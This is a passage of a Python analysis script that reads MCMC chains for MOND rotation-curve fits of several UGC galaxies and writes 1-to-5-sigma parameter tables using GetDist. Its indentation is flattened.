text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07323
low=log10_a0_sol_UGC07323-stats_UGC07323.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07323.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07323
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07323
low=log10_YD_sol_UGC07323-stats_UGC07323.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07323.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07323
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07323
low=df2_sol_UGC07323-stats_UGC07323.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07323.parWithName('df2').limits[i].upper- df2_sol_UGC07323
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07323
low=Dinc_sol_UGC07323-stats_UGC07323.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07323.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07323
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07399 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07399.csv',usecols=[1,2,3,4])
data_array_chain_UGC07399 = numpy.array(full_chain_UGC07399)
mle_soln_UGC07399=[]
for i in range(ndim):
mcmc_UGC07399 = numpy.percentile(data_array_chain_UGC07399[:, i], [16, 50, 84])
q_UGC07399 = numpy.diff(mcmc_UGC07399)
mle_soln_UGC07399.append(mcmc_UGC07399[1])
log10_a0_sol_UGC07399=mle_soln_UGC07399[0]
log10_YD_sol_UGC07399=mle_soln_UGC07399[1]
df2_sol_UGC07399=mle_soln_UGC07399[2]
Dinc_sol_UGC07399=mle_soln_UGC07399[3]
samp_UGC07399 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07399,names = names, labels = labels)
samp_UGC07399.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07399 = samp_UGC07399.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07399
low=log10_a0_sol_UGC07399-stats_UGC07399.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07399.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07399
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07399
low=log10_YD_sol_UGC07399-stats_UGC07399.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07399.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07399
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07399
low=df2_sol_UGC07399-stats_UGC07399.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07399.parWithName('df2').limits[i].upper- df2_sol_UGC07399
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07399
low=Dinc_sol_UGC07399-stats_UGC07399.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07399.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07399
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07399-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07524 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07524.csv',usecols=[1,2,3,4])
data_array_chain_UGC07524 = numpy.array(full_chain_UGC07524)
mle_soln_UGC07524=[]
for i in range(ndim):
mcmc_UGC07524 = numpy.percentile(data_array_chain_UGC07524[:, i], [16, 50, 84])
q_UGC07524 = numpy.diff(mcmc_UGC07524)
mle_soln_UGC07524.append(mcmc_UGC07524[1])
log10_a0_sol_UGC07524=mle_soln_UGC07524[0]
log10_YD_sol_UGC07524=mle_soln_UGC07524[1]
df2_sol_UGC07524=mle_soln_UGC07524[2]
Dinc_sol_UGC07524=mle_soln_UGC07524[3]
samp_UGC07524 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07524,names = names, labels = labels)
samp_UGC07524.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07524 = samp_UGC07524.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07524
low=log10_a0_sol_UGC07524-stats_UGC07524.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07524.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07524
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07524
low=log10_YD_sol_UGC07524-stats_UGC07524.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07524.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07524
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07524
low=df2_sol_UGC07524-stats_UGC07524.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07524.parWithName('df2').limits[i].upper- df2_sol_UGC07524
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07524
low=Dinc_sol_UGC07524-stats_UGC07524.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07524.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07524
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07524-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07559 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07559.csv',usecols=[1,2,3,4])
data_array_chain_UGC07559 = numpy.array(full_chain_UGC07559)
mle_soln_UGC07559=[]
for i in range(ndim):
mcmc_UGC07559 = numpy.percentile(data_array_chain_UGC07559[:, i], [16, 50, 84])
q_UGC07559 = numpy.diff(mcmc_UGC07559)
mle_soln_UGC07559.append(mcmc_UGC07559[1])
log10_a0_sol_UGC07559=mle_soln_UGC07559[0]
log10_YD_sol_UGC07559=mle_soln_UGC07559[1]
df2_sol_UGC07559=mle_soln_UGC07559[2]
Dinc_sol_UGC07559=mle_soln_UGC07559[3]
samp_UGC07559 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07559,names = names, labels = labels)
samp_UGC07559.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07559 = samp_UGC07559.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07559
low=log10_a0_sol_UGC07559-stats_UGC07559.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07559.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07559
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07559
low=log10_YD_sol_UGC07559-stats_UGC07559.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07559.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07559
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07559
low=df2_sol_UGC07559-stats_UGC07559.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07559.parWithName('df2').limits[i].upper- df2_sol_UGC07559
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07559
low=Dinc_sol_UGC07559-stats_UGC07559.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07559.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07559
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07559-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07577 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07577.csv',usecols=[1,2,3,4])
data_array_chain_UGC07577 = numpy.array(full_chain_UGC07577)
mle_soln_UGC07577=[]
for i in range(ndim):
mcmc_UGC07577 = numpy.percentile(data_array_chain_UGC07577[:, i], [16, 50, 84])
q_UGC07577 = numpy.diff(mcmc_UGC07577)
mle_soln_UGC07577.append(mcmc_UGC07577[1])
log10_a0_sol_UGC07577=mle_soln_UGC07577[0]
log10_YD_sol_UGC07577=mle_soln_UGC07577[1]
df2_sol_UGC07577=mle_soln_UGC07577[2]
Dinc_sol_UGC07577=mle_soln_UGC07577[3]
samp_UGC07577 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07577,names = names, labels = labels)
samp_UGC07577.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07577 = samp_UGC07577.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07577
low=log10_a0_sol_UGC07577-stats_UGC07577.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07577.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07577
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07577
low=log10_YD_sol_UGC07577-stats_UGC07577.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07577.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07577
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07577
low=df2_sol_UGC07577-stats_UGC07577.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07577.parWithName('df2').limits[i].upper- df2_sol_UGC07577
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07577
low=Dinc_sol_UGC07577-stats_UGC07577.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07577.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07577
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07577-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07603 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07603.csv',usecols=[1,2,3,4])
data_array_chain_UGC07603 = numpy.array(full_chain_UGC07603)
mle_soln_UGC07603=[]
for i in range(ndim):
mcmc_UGC07603 = numpy.percentile(data_array_chain_UGC07603[:, i], [16, 50, 84])
q_UGC07603 = numpy.diff(mcmc_UGC07603)
mle_soln_UGC07603.append(mcmc_UGC07603[1])
log10_a0_sol_UGC07603=mle_soln_UGC07603[0]
log10_YD_sol_UGC07603=mle_soln_UGC07603[1]
df2_sol_UGC07603=mle_soln_UGC07603[2]
Dinc_sol_UGC07603=mle_soln_UGC07603[3]
samp_UGC07603 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07603,names = names, labels = labels)
samp_UGC07603.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07603 = samp_UGC07603.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07603
low=log10_a0_sol_UGC07603-stats_UGC07603.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07603.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07603
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07603
low=log10_YD_sol_UGC07603-stats_UGC07603.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07603.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07603
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07603
low=df2_sol_UGC07603-stats_UGC07603.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07603.parWithName('df2').limits[i].upper- df2_sol_UGC07603
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07603
low=Dinc_sol_UGC07603-stats_UGC07603.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07603.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07603
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07603-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07690 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07690.csv',usecols=[1,2,3,4])
data_array_chain_UGC07690 = numpy.array(full_chain_UGC07690)
mle_soln_UGC07690=[]
for i in range(ndim):
mcmc_UGC07690 = numpy.percentile(data_array_chain_UGC07690[:, i], [16, 50, 84])
q_UGC07690 = numpy.diff(mcmc_UGC07690)
mle_soln_UGC07690.append(mcmc_UGC07690[1])
log10_a0_sol_UGC07690=mle_soln_UGC07690[0]
log10_YD_sol_UGC07690=mle_soln_UGC07690[1]
df2_sol_UGC07690=mle_soln_UGC07690[2]
Dinc_sol_UGC07690=mle_soln_UGC07690[3]
samp_UGC07690 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07690,names = names, labels = labels)
samp_UGC07690.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07690 = samp_UGC07690.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07690
low=log10_a0_sol_UGC07690-stats_UGC07690.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07690.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07690
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07690
low=log10_YD_sol_UGC07690-stats_UGC07690.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07690.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07690
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07690
low=df2_sol_UGC07690-stats_UGC07690.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07690.parWithName('df2').limits[i].upper- df2_sol_UGC07690
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07690
low=Dinc_sol_UGC07690-stats_UGC07690.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07690.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07690
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07690-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07866 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07866.csv',usecols=[1,2,3,4])
data_array_chain_UGC07866 = numpy.array(full_chain_UGC07866)
mle_soln_UGC07866=[]
for i in range(ndim):
mcmc_UGC07866 = numpy.percentile(data_array_chain_UGC07866[:, i], [16, 50, 84])
q_UGC07866 = numpy.diff(mcmc_UGC07866)
mle_soln_UGC07866.append(mcmc_UGC07866[1])
log10_a0_sol_UGC07866=mle_soln_UGC07866[0]
log10_YD_sol_UGC07866=mle_soln_UGC07866[1]
df2_sol_UGC07866=mle_soln_UGC07866[2]
Dinc_sol_UGC07866=mle_soln_UGC07866[3]
samp_UGC07866 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07866,names = names, labels = labels)
samp_UGC07866.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07866 = samp_UGC07866.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07866
low=log10_a0_sol_UGC07866-stats_UGC07866.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07866.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07866
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07866
low=log10_YD_sol_UGC07866-stats_UGC07866.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07866.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07866
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07866
low=df2_sol_UGC07866-stats_UGC07866.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07866.parWithName('df2').limits[i].upper- df2_sol_UGC07866
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07866
low=Dinc_sol_UGC07866-stats_UGC07866.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07866.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07866
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07866-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC08286 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC08286.csv',usecols=[1,2,3,4])
data_array_chain_UGC08286 = numpy.array(full_chain_UGC08286)
mle_soln_UGC08286=[]
for i in range(ndim):
mcmc_UGC08286 = numpy.percentile(data_array_chain_UGC08286[:, i], [16, 50, 84])
q_UGC08286 = numpy.diff(mcmc_UGC08286)
mle_soln_UGC08286.append(mcmc_UGC08286[1])
log10_a0_sol_UGC08286=mle_soln_UGC08286[0]
log10_YD_sol_UGC08286=mle_soln_UGC08286[1]
df2_sol_UGC08286=mle_soln_UGC08286[2]
Dinc_sol_UGC08286=mle_soln_UGC08286[3]
samp_UGC08286 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC08286,names = names, labels = labels)
samp_UGC08286.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC08286 = samp_UGC08286.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC08286
low=log10_a0_sol_UGC08286-stats_UGC08286.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC08286.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC08286
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC08286-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
